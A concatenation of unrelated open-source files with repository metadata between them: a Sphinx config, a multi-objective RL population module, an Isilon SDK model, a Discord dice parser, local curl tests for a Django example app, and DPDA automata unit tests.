#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'POTdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'POT.tex', u'POT Python Optimal Transport library',
u'Rémi Flamary, Nicolas Courty', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pot', u'POT Python Optimal Transport library Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'POT', u'POT Python Optimal Transport library Documentation',
author, 'POT', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| 32.009404 | 80 | 0.714719 |
274f10bd35f5d5dae96909eac46439516aa3fa21 | 15,358 | py | Python | morl/population_3d.py | yunshengtian/PGMORL | 71fd9ac1128ca129de4a7c8725d5f650e329379f | [
"MIT"
] | 47 | 2020-07-11T02:00:02.000Z | 2022-03-28T09:55:08.000Z | morl/population_3d.py | yunshengtian/PGMORL | 71fd9ac1128ca129de4a7c8725d5f650e329379f | [
"MIT"
] | 2 | 2021-09-01T15:45:21.000Z | 2021-10-13T09:20:07.000Z | morl/population_3d.py | mit-gfx/PGMORL | 71fd9ac1128ca129de4a7c8725d5f650e329379f | [
"MIT"
] | 13 | 2020-07-15T02:10:42.000Z | 2022-03-09T10:18:23.000Z | import numpy as np
import torch
import torch.optim as optim
from copy import deepcopy
from sample import Sample
from utils import get_ep_indices, generate_weights_batch_dfs, update_ep, compute_hypervolume, compute_sparsity, update_ep_and_compute_hypervolume_sparsity
from scipy.optimize import least_squares
import torch.multiprocessing
torch.multiprocessing.set_sharing_strategy('file_system')
from torch.multiprocessing import Process, Queue, Event
from hypervolume import InnerHyperVolume
def collect_nearest_data(opt_graph, index, threshold = 0.1):
objs_data, weights_data, delta_objs_data = [], [], []
for i in range(len(opt_graph.objs)):
diff = np.abs(opt_graph.objs[index] - opt_graph.objs[i])
if np.all(diff < np.abs(opt_graph.objs[index]) * threshold):
for next_index in opt_graph.succ[i]:
objs_data.append(opt_graph.objs[i])
weights_data.append(opt_graph.weights[next_index] / np.sum(opt_graph.weights[next_index]))
delta_objs_data.append(opt_graph.delta_objs[next_index])
return objs_data, weights_data, delta_objs_data
def predict_hyperbolic(args, opt_graph, index, test_weights):
test_weights = np.array(test_weights)
for test_weight in test_weights:
test_weight /= np.sum(test_weight)
threshold = 0.1
sigma = 0.03
# gradually enlarging the searching range so that get enough data point to fit the model
while True:
objs_data, weights_data, delta_objs_data = collect_nearest_data(opt_graph, index, threshold)
cnt_data = 0
for i in range(len(weights_data)):
flag = True
for j in range(i):
if np.linalg.norm(weights_data[i] - weights_data[j]) < 1e-5:
flag = False
break
if flag:
cnt_data += 1
if cnt_data > 3:
break
if cnt_data > 3 or threshold >= 1.0:
break
else:
threshold *= 2.0
sigma *= 2.0
def f(x, A, a, b, c):
return A * (np.exp(a * (x - b)) - 1) / (np.exp(a * (x - b)) + 1) + c
def fun(params, x, y):
# f = A * (exp(a(x - b)) - 1) / (exp(a(x - b)) + 1) + c
return (params[0] * (np.exp(params[1] * (x - params[2])) - 1.) / (np.exp(params[1] * (x - params[2])) + 1) + params[3] - y) * w
def jac(params, x, y):
A, a, b, c = params[0], params[1], params[2], params[3]
J = np.zeros([len(params), len(x)])
# df_dA = (exp(a(x - b)) - 1) / (exp(a(x - b)) + 1)
J[0] = ((np.exp(a * (x - b)) - 1) / (np.exp(a * (x - b)) + 1)) * w
# df_da = A(x - b)(2exp(a(x-b)))/(exp(a(x-b)) + 1)^2
J[1] = (A * (x - b) * (2. * np.exp(a * (x - b))) / ((np.exp(a * (x - b)) + 1) ** 2)) * w
# df_db = A(-a)(2exp(a(x-b)))/(exp(a(x-b)) + 1)^2
J[2] = (A * (-a) * (2. * np.exp(a * (x - b))) / ((np.exp(a * (x - b)) + 1) ** 2)) * w
# df_dc = 1
J[3] = w
return np.transpose(J)
M = args.obj_num
delta_predictions = []
for dim in range(M):
train_x = []
train_y = []
w = []
for i in range(len(objs_data)):
train_x.append(weights_data[i][dim])
train_y.append(delta_objs_data[i][dim])
diff = np.abs(objs_data[i] - opt_graph.objs[index])
dist = np.linalg.norm(diff / np.abs(opt_graph.objs[index]))
coef = np.exp(-((dist / sigma) ** 2) / 2.0)
w.append(coef)
train_x = np.array(train_x)
train_y = np.array(train_y)
w = np.array(w)
A_upperbound = np.clip(np.max(train_y) - np.min(train_y), 1.0, 500.0)
params0 = np.ones(4)
f_scale = 20.
res_robust = least_squares(fun, params0, loss='soft_l1', f_scale = f_scale, args = (train_x, train_y), jac = jac, bounds = ([0, 0.1, -5., -500.], [A_upperbound, 20., 5., 500.]))
delta_predictions.append(f(test_weights.T[dim], *res_robust.x))
predictions = []
delta_predictions = np.transpose(np.array(delta_predictions))
original_objs = opt_graph.objs[index]
for i in range(len(test_weights)):
predictions.append(original_objs + delta_predictions[i])
results = {'sample_index': index, 'predictions': predictions}
return results
class Population:
def __init__(self, args):
self.sample_batch = [] # all samples in population
self.pbuffer_size = args.pbuffer_size
self.obj_num = args.obj_num
self.z_min = np.zeros(args.obj_num) # left-lower reference point
self.pbuffer_vec = []
generate_weights_batch_dfs(0, args.obj_num, 0.0, 1.0, 1.0 / (args.pbuffer_num - 1), [], self.pbuffer_vec)
for i in range(len(self.pbuffer_vec)):
self.pbuffer_vec[i] = self.pbuffer_vec[i] / np.linalg.norm(self.pbuffer_vec[i])
self.pbuffer_num = len(self.pbuffer_vec)
self.pbuffers = [[] for _ in range(self.pbuffer_num)] # store the sample indices in each pbuffer
self.pbuffer_dist = [[] for _ in range(self.pbuffer_num)] # store the sample distance in each pbuffer
def find_buffer_id(self, f):
max_dot, buffer_id = -np.inf, -1
for i in range(self.pbuffer_num):
dot = np.dot(self.pbuffer_vec[i], f)
if dot > max_dot:
max_dot, buffer_id = dot, i
return buffer_id
def insert_pbuffer(self, index, objs, enforce):
f = objs - self.z_min
if np.min(f) < 1e-7:
return False
dist = np.linalg.norm(f)
buffer_id = self.find_buffer_id(f)
inserted = False
if enforce:
for i in range(len(self.pbuffers[buffer_id])):
if self.pbuffer_dist[buffer_id][i] < dist:
self.pbuffers[buffer_id].insert(i, index)
self.pbuffer_dist[buffer_id].insert(i, dist)
inserted = True
break
if not inserted:
self.pbuffers[buffer_id].append(index)
self.pbuffer_dist[buffer_id].append(dist)
inserted = True
else:
for i in range(len(self.pbuffers[buffer_id])):
if self.pbuffer_dist[buffer_id][i] < dist:
self.pbuffers[buffer_id].insert(i, index)
self.pbuffer_dist[buffer_id].insert(i, dist)
inserted = True
break
if inserted and len(self.pbuffers[buffer_id]) > self.pbuffer_size:
self.pbuffers[buffer_id] = self.pbuffers[buffer_id][:self.pbuffer_size]
self.pbuffer_dist[buffer_id] = self.pbuffer_dist[buffer_id][:self.pbuffer_size]
elif (not inserted) and len(self.pbuffers[buffer_id]) < self.pbuffer_size:
self.pbuffers[buffer_id].append(index)
self.pbuffer_dist[buffer_id].append(dist)
inserted = True
return inserted
def update(self, sample_batch):
### population = Union(population, offspring) ###
all_sample_batch = self.sample_batch + sample_batch
self.sample_batch = []
self.pbuffers = [[] for _ in range(self.pbuffer_num)]
self.pbuffer_dist = [[] for _ in range(self.pbuffer_num)]
### select population by performance buffer ###
for i, sample in enumerate(all_sample_batch):
self.insert_pbuffer(i, sample.objs, False)
for pbuffer in self.pbuffers:
for index in pbuffer:
self.sample_batch.append(all_sample_batch[index])
def evaluate_hv(self, candidates, mask, virtual_ep_objs_batch):
hv = [0.0 for _ in range(len(candidates))]
for i in range(len(candidates)):
if mask[i]:
new_ep_objs_batch = update_ep(virtual_ep_objs_batch, candidates[i]['prediction'])
hv[i] = compute_hypervolume(new_ep_objs_batch)
return hv
def evaluate_sparsity(self, candidates, mask, virtual_ep_objs_batch):
sparsity = [0.0 for _ in range(len(candidates))]
for i in range(len(candidates)):
if mask[i]:
new_ep_objs_batch = update_ep(virtual_ep_objs_batch, candidates[i]['prediction'])
sparsity[i] = compute_sparsity(new_ep_objs_batch)
return sparsity
def evaluate_hypervolume_sparsity(self, candidates, mask, virtual_ep_objs_batch):
hv = [0.0 for _ in range(len(candidates))]
sparsity = [0.0 for _ in range(len(candidates))]
for i in range(len(candidates)):
if mask[i]:
new_ep_objs_batch = update_ep(virtual_ep_objs_batch, candidates[i]['prediction'])
hv[i] = compute_hypervolume(new_ep_objs_batch)
sparsity[i] = compute_sparsity(new_ep_objs_batch)
return hv, sparsity
def evaluate_hypervolume_sparsity_parallel(self, args, candidates, mask, virtual_ep_objs_batch):
hv = [0.0 for _ in range(len(candidates))]
sparsity = [0.0 for _ in range(len(candidates))]
processes = []
max_process_num = args.num_tasks * args.num_processes
queue = Queue()
for i in range(len(candidates)):
if mask[i]:
p = Process(target=update_ep_and_compute_hypervolume_sparsity, args=(i, virtual_ep_objs_batch, candidates[i]['prediction'], queue))
p.start()
processes.append(p)
if len(processes) >= max_process_num:
for _ in processes:
task_id, hv_res, sparsity_res = queue.get()
hv[task_id] = hv_res
sparsity[task_id] = sparsity_res
processes = []
for _ in processes:
task_id, hv_res, sparsity_res = queue.get()
hv[task_id] = hv_res
sparsity[task_id] = sparsity_res
return hv, sparsity
def prediction_guided_selection(self, args, iteration, ep, opt_graph, scalarization_template):
N = args.num_tasks # number of (sample, weight) to be selected
num_weights = args.num_weight_candidates # for each sample, we have num_weights optimization directions to be candidates, they distribute evenly around the last weight direction
### Prediction ###
candidates = [] # list of candidate, each candidate is a (sample, weight) pair associated with their predicted future point
for sample in self.sample_batch:
# get weights evenly distributed around the last weight direction and only discard the weight in the left bottom region
weight_center = opt_graph.weights[sample.optgraph_id]
weight_center = weight_center / np.sum(weight_center)
weight_candidates = []
generate_weights_batch_dfs(0, args.obj_num, 0.0, 1.0, args.delta_weight / 2.0, [], weight_candidates)
test_weights = []
# add weight center
duplicated = False
for succ in opt_graph.succ[sample.optgraph_id]:
w = deepcopy(opt_graph.weights[succ])
w = w / np.sum(w)
if np.linalg.norm(w - weight_center) < 1e-3:
duplicated = True
break
if not duplicated:
test_weights.append(weight_center)
# randomly add other weights
weight_indices = np.array([i for i in range(len(weight_candidates))])
np.random.shuffle(weight_indices)
for i in range(len(weight_indices)):
if len(test_weights) >= num_weights: # if enough weights have been selected, then stop
break
weight = weight_candidates[weight_indices[i]]
if np.linalg.norm(weight - weight_center) < 1e-3:
continue
angle = np.arccos(np.clip(np.dot(weight_center, weight) / np.linalg.norm(weight_center) / np.linalg.norm(weight), -1.0, 1.0))
if angle < np.pi / 4.0: # check if weight is close to the previous weight
duplicated = False
for succ in opt_graph.succ[sample.optgraph_id]:
w = deepcopy(opt_graph.weights[succ])
w = w / np.sum(w)
if np.linalg.norm(w - weight) < 1e-3:
duplicated = True
break
if not duplicated:
test_weights.append(weight)
if len(test_weights) > 0:
results = predict_hyperbolic(args, opt_graph, sample.optgraph_id, test_weights)
for i in range(len(test_weights)):
candidates.append({'sample': sample, 'weight': test_weights[i], \
'prediction': results['predictions'][i]})
### Optimization ###
# initialize virtual ep as current ep
virtual_ep_objs_batch = []
for i in range(len(ep.sample_batch)):
virtual_ep_objs_batch.append(deepcopy(ep.sample_batch[i].objs))
mask = np.ones(len(candidates), dtype = bool)
predicted_offspring_objs = []
elite_batch, scalarization_batch = [], []
# greedy algorithm for knapsack problem
alpha = args.sparsity
for _ in range(N):
hv, sparsity = self.evaluate_hypervolume_sparsity_parallel(args, candidates, mask, virtual_ep_objs_batch)
# select the one with max dhv - alpha * dsparsity
max_metrics, best_id = -np.inf, -1
for i in range(len(candidates)):
if mask[i]:
if hv[i] - alpha * sparsity[i] > max_metrics:
max_metrics, best_id = hv[i] - alpha * sparsity[i], i
if best_id == -1:
print('Too few candidates')
break
elite_batch.append(candidates[best_id]['sample'])
scalarization = deepcopy(scalarization_template)
scalarization.update_weights(candidates[best_id]['weight'] / np.sum(candidates[best_id]['weight']))
scalarization_batch.append(scalarization)
mask[best_id] = False
# update virtual_ep_objs_batch
predicted_new_objs = [deepcopy(candidates[best_id]['prediction'])]
virtual_ep_objs_batch = update_ep(virtual_ep_objs_batch, predicted_new_objs[0])
predicted_offspring_objs.extend(predicted_new_objs)
return elite_batch, scalarization_batch, predicted_offspring_objs
def random_selection(self, args, scalarization_template):
elite_batch, scalarization_batch = [], []
for _ in range(args.num_tasks):
elite_idx = np.random.choice(len(self.sample_batch))
elite_batch.append(self.sample_batch[elite_idx])
weights = np.random.uniform(args.min_weight, args.max_weight, args.obj_num)
weights = weights / np.sum(weights)
scalarization = deepcopy(scalarization_template)
scalarization.update_weights(weights)
scalarization_batch.append(scalarization)
return elite_batch, scalarization_batch
| 44.387283 | 185 | 0.586209 |
22f49225ecb30a1ee88e7af914869cba037b34fd | 3,327 | py | Python | isi_sdk_8_2_1/isi_sdk_8_2_1/models/hdfs_fsimage_job_settings.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 24 | 2018-06-22T14:13:23.000Z | 2022-03-23T01:21:26.000Z | isi_sdk_8_2_1/isi_sdk_8_2_1/models/hdfs_fsimage_job_settings.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 46 | 2018-04-30T13:28:22.000Z | 2022-03-21T21:11:07.000Z | isi_sdk_8_2_1/isi_sdk_8_2_1/models/hdfs_fsimage_job_settings.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 29 | 2018-06-19T00:14:04.000Z | 2022-02-08T17:51:19.000Z | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 8
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from isi_sdk_8_2_1.models.hdfs_fsimage_job_settings_settings import HdfsFsimageJobSettingsSettings # noqa: F401,E501
class HdfsFsimageJobSettings(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'settings': 'HdfsFsimageJobSettingsSettings'
}
attribute_map = {
'settings': 'settings'
}
def __init__(self, settings=None): # noqa: E501
"""HdfsFsimageJobSettings - a model defined in Swagger""" # noqa: E501
self._settings = None
self.discriminator = None
if settings is not None:
self.settings = settings
@property
def settings(self):
"""Gets the settings of this HdfsFsimageJobSettings. # noqa: E501
Settings for the HDFS FSImage job. # noqa: E501
:return: The settings of this HdfsFsimageJobSettings. # noqa: E501
:rtype: HdfsFsimageJobSettingsSettings
"""
return self._settings
@settings.setter
def settings(self, settings):
"""Sets the settings of this HdfsFsimageJobSettings.
Settings for the HDFS FSImage job. # noqa: E501
:param settings: The settings of this HdfsFsimageJobSettings. # noqa: E501
:type: HdfsFsimageJobSettingsSettings
"""
self._settings = settings
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, HdfsFsimageJobSettings):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 28.435897 | 117 | 0.58942 |
8f1252d09b124a2b04c2846293668f786a2f805b | 5,736 | py | Python | cogs/dice/dice_utils.py | VegaSera/SWNDiscordBot2 | cb73b9d51591b6af9f2a1a603ea0dd8a7161020c | [
"MIT"
] | 2 | 2020-09-08T18:08:55.000Z | 2021-06-22T17:13:32.000Z | cogs/dice/dice_utils.py | VegaSera/SWNDiscordBot2 | cb73b9d51591b6af9f2a1a603ea0dd8a7161020c | [
"MIT"
] | null | null | null | cogs/dice/dice_utils.py | VegaSera/SWNDiscordBot2 | cb73b9d51591b6af9f2a1a603ea0dd8a7161020c | [
"MIT"
] | 1 | 2020-06-30T19:12:27.000Z | 2020-06-30T19:12:27.000Z | from cogs.utils.ToolUtils import diceroller
import re
def keep_dice(die, side, keep):
"""Dice in the format of XdYkZ. X is the number of dice to roll, Y is the number of side each die should have. Z is the number of dice to keep."""
tot, verbose = diceroller(die, side, verbose=True)
if keep >= die: # If this is true, we keep all dice and no dice need to be dropped.
return tot, verbose
elif keep <= 0: # All dice get dropped. Total = 0 and all entries in verbose are crossed out.
crossout = []
for i in verbose:
crossout.append("~~" + str(i) + "~~")
return 0, crossout
else: # Keep dice is between 1 and the number of dice.
kept_list = []
crossout = verbose
for i in range(int(keep)):
kept_list.append(max(crossout))
crossout.remove(max(crossout))
total = sum(kept_list)
for j in crossout: # The only things remaining in this are values to be crossed out.
kept_list.append("~~" + str(j) + "~~")
return total, kept_list
def drop_dice(die, side, drop):
"""Dice in the format of XdYdZ. X is the number of dice to roll, Y is the number of side each die should have. Z is the number of dice to drop."""
tot, verbose = diceroller(die, side, verbose=True)
if drop >= die: # If this is true, we drop all dice and return 0, with all entries crossed out.
crossout = []
for i in verbose:
crossout.append("~~" + str(i) + "~~")
return 0, crossout
elif drop <= 0: # No dice get dropped.
return tot, verbose
else: # Drop dice is between 1 and the number of dice.
kept_list = []
newsplit = verbose
for j in range(int(die) - int(drop)):
kept_list.append(max(newsplit))
newsplit.remove(max(newsplit))
total = sum(kept_list)
for j in newsplit:
kept_list.append("~~" + str(j) + "~~")
return total, kept_list
def is_sensible_roll(dice):
"""Checks the dice results for sensible sizes. Returns a boolean, and an error string if false."""
if int(dice[1]) > 100: # Attempted to roll more than 100 dice in a single group.
return False, "Attempted to roll more than 100 dice in a single group."
elif int(dice[2]) > 50000: #Attempted to roll a die with more than 50000 sides.
return False, "Attempted to roll a dice with more than 50000 sides."
else:
return True, ""
def parse_dice_string(dicestring, verbose=False):
"""Parses our dice string and does the appropriate math."""
results = []
return_string = ''
simple_dice = re.findall('(\A|[+-])(\d+)d(\d+)(?=[+-]|\Z|\s|\n)', dicestring)
keepdice = re.findall('(\A|[+-])(\d+)d(\d+)k(\d+)(?=[+-]|\Z|\s|\n)', dicestring)
dropdice = re.findall('(\A|[+-])(\d+)d(\d+)d(\d+)(?=[+-]|\Z|\s|\n)', dicestring)
modifier = re.findall('([+-])(\d+)(?=[^d0-9]|[+-]|\s|\Z)', dicestring)
#Keep Dice
#Structure of the keep dice - [Sign/Start Of String][Number of Dice][Number of Sides][Number to Keep]
#Checking for sensibility
for i in keepdice:
if not is_sensible_roll(i)[0]:
return 0, is_sensible_roll(i)[1]
print(i)
# If the dice are sensible
total, kept_list = keep_dice(int(i[1]), int(i[2]), int(i[3]))
verbose_string = '['
for x in kept_list:
verbose_string += (str(x) + ", ")
verbose_string = verbose_string[:-2]
verbose_string += ']'
lst = list(i)
if i[0] not in ['-', '+']:
lst[0] = '+'
else:
lst[0] = i[0]
string = (" " + lst[0] + " " + i[1] + 'd' + i[2] + 'k' + i[3] + '(**' + str(total) + '**)')
if verbose:
string += str(verbose_string)
return_string += string
if i[0] == '-':
results.append(total*-1)
else:
results.append(total)
for i in dropdice:
if not is_sensible_roll(i)[0]:
return 0, is_sensible_roll(i)[1]
total, keptlist = drop_dice(int(i[1]), int(i[2]), int(i[3]))
verbosestring = '['
for x in keptlist:
verbosestring += (str(x) + ', ')
verbosestring = verbosestring[:-2]
verbosestring += ']'
if i[0] not in ['-', '+']:
lst = list(i)
lst[0] = '+'
else:
lst = list(i)
lst[0] = i[0]
string = (" " + lst[0] + " " + i[1] + 'd' + i[2] + 'd' + i[3] + '(**' + str(total) + '**)')
if verbose:
string += str(verbosestring)
return_string += string
if i[0] == '-':
results.append(total * -1)
else:
results.append(total)
for i in simple_dice:
if not is_sensible_roll(i)[0]:
return 0, is_sensible_roll(i)[1]
total, split = diceroller(int(i[1]), int(i[2]), verbose=True)
verbosestring = '['
for x in split:
verbosestring += (str(x) + ', ')
verbosestring = verbosestring[:-2]
verbosestring += ']'
string = (" " + i[0] + " " + i[1] + 'd' + i[2] + '(**' + str(total) + '**)')
if verbose:
string += str(verbosestring)
return_string += string
if i[0] == '-':
results.append(total * -1)
else:
results.append(total)
for i in modifier:
string = " " + str(i[0]) + " **" + str(i[1] + "**")
return_string += string
if i[0] == '-':
results.append(int(i[1]) * -1)
elif i[0] == '+':
results.append(int(i[1]))
return_string = return_string[2:]
return sum(results), return_string | 36.535032 | 150 | 0.532427 |
3d127f5da5b9a29f694f1906ec08096626029d9e | 289 | py | Python | client/verta/verta/__about__.py | Vafilor/modeldb | 57e617fa64368e7c5c8ae186955e3e28b39fd5a9 | [
"Apache-2.0"
] | null | null | null | client/verta/verta/__about__.py | Vafilor/modeldb | 57e617fa64368e7c5c8ae186955e3e28b39fd5a9 | [
"Apache-2.0"
] | null | null | null | client/verta/verta/__about__.py | Vafilor/modeldb | 57e617fa64368e7c5c8ae186955e3e28b39fd5a9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
__description__ = "Python client for interfacing with ModelDB and the Verta platform"
__license__ = "Apache 2.0"
__maintainer__ = "Michael Liu"
__maintainer_email__ = "miliu@verta.ai"
__title__ = "verta"
__url__ = "https://www.verta.ai/"
__version__ = "0.14.12a0"
| 28.9 | 85 | 0.726644 |
538ffe401c49c0d05a43261202eb3c320605d747 | 827 | py | Python | test.py | danx0r/djangle | 3b87a68ad423d87a40764ec50851592121b6b911 | [
"BSD-3-Clause"
] | null | null | null | test.py | danx0r/djangle | 3b87a68ad423d87a40764ec50851592121b6b911 | [
"BSD-3-Clause"
] | 4 | 2019-11-22T19:15:19.000Z | 2021-06-10T20:49:43.000Z | test.py | danx0r/djangle | 3b87a68ad423d87a40764ec50851592121b6b911 | [
"BSD-3-Clause"
] | null | null | null | import os,sys
cmd="""curl 'http://localhost:8000/example/testy/zzz/test?foo=bar' """
print (cmd)
os.system(cmd)
print ("\n")
cmd="""curl 'http://localhost:8000/example/save/test?data=\{"boo":"paw"\}' """
print (cmd)
os.system(cmd)
print ("\n")
cmd="""curl 'http://localhost:8000/example/save/test?data=\[\["boo","paw"\],\[123,"456"\]\]&format=rows' """
print (cmd)
os.system(cmd)
print ("\n")
cmd="""curl -X POST 'http://localhost:8000/example/save/test?format=columns' -d '{"far":["boo","paw"],"zoo":[123,"456"]}' """
print (cmd)
os.system(cmd)
print ("\n")
cmd="""curl -X POST 'http://localhost:8000/example/save/test?format=csv' -d 'f1,f2,f3\n1,22,333\n"four",5,66' """
print (cmd)
os.system(cmd)
print ("\n")
cmd="""curl 'http://localhost:8000/example/search/test?far=paw' """
print (cmd)
os.system(cmd)
print ("\n")
| 25.84375 | 125 | 0.631197 |
2a35042cd7108ee5e05430c63e66e6fccf2150fe | 7,105 | py | Python | tests/test_dpda.py | eohomegrownapps/automata | bd0ec7abd5662c5f1807937db5fdcc6d707c4f47 | [
"MIT"
] | null | null | null | tests/test_dpda.py | eohomegrownapps/automata | bd0ec7abd5662c5f1807937db5fdcc6d707c4f47 | [
"MIT"
] | null | null | null | tests/test_dpda.py | eohomegrownapps/automata | bd0ec7abd5662c5f1807937db5fdcc6d707c4f47 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Classes and functions for testing the behavior of DPDAs."""
# from unittest.mock import patch
import nose.tools as nose
import automata.base.exceptions as exceptions
import automata.pda.exceptions as pda_exceptions
import tests.test_pda as test_pda
from automata.pda.configuration import PDAConfiguration
from automata.pda.dpda import DPDA
from automata.pda.stack import PDAStack
class TestDPDA(test_pda.TestPDA):
"""A test class for testing deterministic finite automata."""
def test_init_dpda(self):
"""Should copy DPDA if passed into DPDA constructor."""
new_dpda = DPDA.copy(self.dpda)
self.assert_is_copy(new_dpda, self.dpda)
def test_init_dpda_missing_formal_params(self):
"""Should raise an error if formal DPDA parameters are missing."""
with nose.assert_raises(TypeError):
DPDA(
states={'q0', 'q1', 'q2'},
input_symbols={'a', 'b'},
initial_state='q0',
final_states={'q0'}
)
def test_init_dpda_no_acceptance_mode(self):
"""Should create a new DPDA."""
new_dpda = DPDA(
states={'q0'},
input_symbols={'a', 'b'},
stack_symbols={'#'},
transitions={
'q0': {
'a': {'#': ('q0', '')},
}
},
initial_state='q0',
initial_stack_symbol='#',
final_states={'q0'}
)
nose.assert_equal(new_dpda.acceptance_mode, 'both')
def test_init_dpda_invalid_acceptance_mode(self):
"""Should raise an error if the NPDA has an invalid acceptance mode."""
with nose.assert_raises(pda_exceptions.InvalidAcceptanceModeError):
self.dpda.acceptance_mode = 'foo'
self.dpda.validate()
def test_validate_invalid_input_symbol(self):
"""Should raise error if a transition has an invalid input symbol."""
with nose.assert_raises(exceptions.InvalidSymbolError):
self.dpda.transitions['q1']['c'] = 'q2'
self.dpda.validate()
def test_validate_invalid_stack_symbol(self):
"""Should raise error if a transition has an invalid stack symbol."""
with nose.assert_raises(exceptions.InvalidSymbolError):
self.dpda.transitions['q1']['a']['2'] = ('q1', ('1', '1'))
self.dpda.validate()
def test_validate_nondeterminism(self):
"""Should raise error if DPDA exhibits nondeterminism."""
with nose.assert_raises(pda_exceptions.NondeterminismError):
self.dpda.transitions['q2']['b']['0'] = ('q2', '0')
self.dpda.validate()
def test_read_input_rejected_nondeterministic_transition(self):
"""Should raise error if DPDA exhibits nondeterminism."""
with nose.assert_raises(pda_exceptions.NondeterminismError):
self.dpda.transitions['q2']['b']['0'] = ('q2', '0')
self.dpda.read_input("abb")
def test_validate_invalid_initial_state(self):
"""Should raise error if the initial state is invalid."""
with nose.assert_raises(exceptions.InvalidStateError):
self.dpda.initial_state = 'q4'
self.dpda.validate()
def test_validate_invalid_initial_stack_symbol(self):
"""Should raise error if the initial stack symbol is invalid."""
with nose.assert_raises(exceptions.InvalidSymbolError):
self.dpda.initial_stack_symbol = '2'
self.dpda.validate()
def test_validate_invalid_final_state(self):
"""Should raise error if the final state is invalid."""
with nose.assert_raises(exceptions.InvalidStateError):
self.dpda.final_states = {'q4'}
self.dpda.validate()
def test_read_input_valid_accept_by_final_state(self):
"""Should return correct config if DPDA accepts by final state."""
nose.assert_equal(
self.dpda.read_input('aabb'),
PDAConfiguration('q3', '', PDAStack(['0']))
)
def test_read_input_invalid_accept_by_final_state(self):
"""Should not accept by final state if DPDA accepts by empty stack."""
self.dpda.acceptance_mode = 'empty_stack'
with nose.assert_raises(exceptions.RejectionException):
self.dpda.read_input('aabb')
def test_read_input_valid_accept_by_empty_stack(self):
"""Should return correct config if DPDA accepts by empty stack."""
self.dpda.transitions['q2']['']['0'] = ('q2', '')
self.dpda.acceptance_mode = 'empty_stack'
nose.assert_equal(
self.dpda.read_input('aabb'),
PDAConfiguration('q2', '', PDAStack([]))
)
def test_read_input_invalid_accept_by_empty_stack(self):
"""Should not accept by empty stack if DPDA accepts by final state."""
self.dpda.transitions['q2']['']['0'] = ('q2', '')
with nose.assert_raises(exceptions.RejectionException):
self.dpda.read_input('aabb')
def test_read_input_valid_consecutive_lambda_transitions(self):
